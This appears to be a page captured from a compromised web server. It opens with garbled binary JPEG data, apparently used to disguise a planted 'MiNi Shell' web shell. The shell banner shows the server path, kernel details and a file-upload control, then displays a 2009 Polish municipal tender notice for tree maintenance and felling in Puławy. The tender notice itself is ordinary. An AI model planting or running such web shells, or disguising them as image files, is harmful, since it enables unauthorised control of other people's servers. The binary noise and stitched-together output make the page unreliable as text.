JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/229760-N-2009.html

<p class="kh_header"><b>Puławy: Prace konserwacyjno-pielęgnacyjne drzew oraz wycinka drzew i likwidacja pni po wycinkach w pasach drogowych dróg gminnych, wewnętrznych,powiatowych, na terenach zieleni gminnej w Puławach.</b><br>
<b>Numer ogłoszenia: 229760 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich , ul. Zygmunta Wróblewskiego 15, 24-100 Puławy, woj. lubelskie, tel. 081 8884090, faks 081 8884847.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace konserwacyjno-pielęgnacyjne drzew oraz wycinka drzew i likwidacja pni po wycinkach w pasach drogowych dróg gminnych, wewnętrznych,powiatowych, na terenach zieleni gminnej w Puławach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace konserwacyjno-pielęgnacyjne  drzew oraz wycinka  i  likwidacja pni po wycinkach  w pasach drogowych dróg gminnych, wewnętrznych, powiatowych, na terenach   zieleni gminnej  w Puławach wg zadań:

Zadanie I:
Prace konserwacyjno-pielęgnacyjne dotyczą  300 szt.  drzew,  które szczegółowo zostały określone w Inwentaryzacji drzew w ul. Słowackiego (w tym na terenie zieleni  przyległym na wys. posesji Słowackiego 23) oraz w ul. Sienkiewicza. Inwentaryzacja szczegółowa  w szczególności dotyczy:
Pielęgnacji drzew  starych o obw. pni 60-300 cm 
Zakres prac obejmuje:
Prace pielęgnacyjno-konserwacyjne drzew, cięcia sanitarne, prześwietlające, korygujące, techniczne-zapewniające skrajnię pozioma i pionową, zapewniające widoczność znaków drogowych
- zdjęcie posuszu (korekta korony),
- redukcja korony (wierzchołków),
- wyprowadzenie wierzchołków przy drzewach młodych
- wiązania (Cobra) 30 szt. wiązań - dot. 12 szt.  drzew
Inwentaryzacja drzew   jest do wglądu Wykonawców w siedzibie Zamawiającego.
Zadanie II:
1. Prace  konserwacyjno-pielęgnacyjne drzew i krzewów obejmują łącznie  200  szt. drzew (dotyczą drzew starych o obw. pni 30-300 cm   w obrębie ulic i terenów:
- ul. Sieroszewskiego
- ul. Żeromskiego
- ul. Norwida
- ul. Kraszewskiego
- ul. Naukowskiej
- ul. Kilińskiego, Kołłątaja (interwencyjnie)
Prace konserwacyjno -pielęgnacyjne w szczególności winny obejmować cięcia prześwietlające koronę drzew, cięcia sanitarne,  drzew , krzewów, cięcia pod kątem bezpieczeństwa ruchu drogowego, odsłonięcia lamp oświetleniowych i kolizji z budynkami. Inwentaryzacja drzew   jest do wglądu Wykonawców w siedzibie Zamawiającego.
Wycinka drzew z likwidacją  pni po wycince  na terenie miasta Puławy
2.Wycinka 38 szt. drzew z likwidacją pni  w tym:
-  21 szt. w Al. Królewskiej i 1 szt w ul. Piłsudskiego (zgodnie z decyzją Lubelskiego Wojewódzkiego Konserwatora Zabytków). Drzewa stare o obw. pnia 100-400 cm w tym  topola w ul. Piłsudskiego o obw. pnia  406 cm,
- 16 szt. o obw. pnia 30-300cm na terenie miasta Puławy zgodnie z decyzją na wycinkę tych drzew.
Ponadto Wykonawca ponosi odpowiedzialność wobec roszczeń osób trzecich w tym odpowiedzialność  za szkody materialne  wyrządzone  na obiektach publicznych i prywatnych  podczas wykonywania prac   - będących przedmiotem zamówienia.
Z uwagi na charakter zamówienia prace winny być wykonywane w sposób najbezpieczniejszy przy zabezpieczeniu i oznakowaniu terenu zgodnie z obowiązującymi przepisami,  również dewastacje winny być likwidowane na bieżąco przy współpracy z Policją i Strażą Miejską.
UWAGA :
Przy pielęgnacji i wycince drzew należy zwrócić szczególną uwagę na obecność ptasich gniazd ( w okresie lęgowym), należy chronić przed uszkodzeniem i wypłoszeniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.21.14.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.000 zł, słownie:
(dwa tysiące  zł.) w tym: 
- na Zadanie I - w wys. 1.000,- zł
- na Zadanie II - w wys.1. 000,- zł.
2. Wadium może być wniesione w następujących formach:
a) pieniężnej,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt.2  ustawy z dnia 28 maja 2004r o  zmianie ustawy o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości oraz niektórych ustaw (Dz. U. Nr 109, poz. 1158 z 2000r. z poź. zm.)
3. W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść na konto Zarządu  Dróg Miejskich w Puławach -  GETIN - BANK  31  1560 1195 2311 0973 9273 0003.
Wadium winno być na koncie Zamawiającego nie później niż  przed upływem terminu składania ofert. Dowód potwierdzenia złożenia wadium należy załączyć do oferty.
4.  Zamawiający jest obowiązany niezwłocznie zwrócić wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy,
c) zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich składania.
5.  Na pisemny wniosek Wykonawcy, Zamawiający zwróci wadium niezwłocznie:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.
6. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
7. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy:
a) odmówił podpisania umowy na warunkach określonych w ofercie,
b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podst. art. 46 ust 2 pkt. 2 i 3 ustawy Prawo zamówień publicznych, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:
a) posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
   b) posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym 
   i osobami zdolnymi do wykonania zamówienia, lub przedstawi  pisemne zobowiązanie innych       
   podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  
   zamówienia.
  c) znajdujący się z sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
  d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy   
  PZP,  a ponadto:	
- w okresie ostatnich 3 lat wykonali min. 1 usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia, o wartości łącznej zamówień (z WAT) wynoszącej min. 80 % oferowanej ceny na wykonanie przedmiotu zamówienia,
- wykonali ww. usługę należycie,
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej
- spełniają pozostałe warunki SIWZ 
2. Zgodnie z art. 26 ust. 2 załączą dokumenty wymagane przez zamawiającego.
3. Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady  spełnia, nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wypełniony i podpisany formularz oferty  wg ZAŁĄCZNIKA NR 1. 
2. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  wg ZAŁĄCZNIKA NR 2. 
3. Dowód wpłaty (wniesienia) wadium. 
4. Dokumenty zgodne z Rozporządzeniem  Prezesa Rady Ministrów z dnia 19 maja 2006  r.(Dz.U. Nr 87, poz. 605) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane oraz zgodnie ze zmianami zawartymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 16 października 2008 r. (Dz.U. Nr 188 2008 r. poz.1155) tj.:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	wykaz wykonanych usług wg ZAŁĄCZNIKA NR 3
c)	dokumenty potwierdzające, że usługi wykazane w załączniku nr 3,  zostały wykonane należycie,
d)	polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
e)	dokumenty (stosowne zaświadczenie) określone § 8 ust.3i4 oraz w §13 Rozporządzenia  Ministra Kultury z dnia 09.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150 poz.1579). - dot. Zadania II
f)	aktualne zaświadczenie  o ukończeniu szkolenia z zakresu wykonywanych niektórych czynności związanych z kierowaniem ruchem drogowym wydanym przez Komendę Wojewódzką Policji (zgodnie z § 9 ust.5 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 18 lipca 2008 r. w sprawie kierowania ruchem drogowym (Dz.U.Nr 132, poz 839).
5.W/w dokumenty Wykonawca może złożyć w formie oryginału lub kserokopii poświadczonej (za zgodność z oryginałem) przez Wykonawcę lub pełnomocnego przedstawiciela Wykonawcy. 
6.   Zgodnie z art. 23 ust. 1  PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
6.1.W ww. przypadku Wykonawcy winni ustanowić pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego. 
7. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w pkt. 4  podpunktach a-d winien dołączyć każdy podmiot występujący wspólnie.
8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 4 ppkt. a składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
9. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania  -  dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
Dokumenty, o których mowa w pkt 8  i w pkt 9 są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski, poświadczonym przez Wykonawcę. 
10. Jeżeli Wykonawca nie złoży wymaganych dokumentów, oświadczeń lub nie spełni jednego bądź więcej warunków, zostanie wykluczony z postępowania. 
10.1. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się 
za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pulawyzdm.bip.e-zeto.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich 24-100 Puławy, ul. Wróblewskiego 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 09:50, miejsce: Zarząd Dróg Miejskich 24-100 Puławy, ul. Wróblewskiego 15, pok. nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com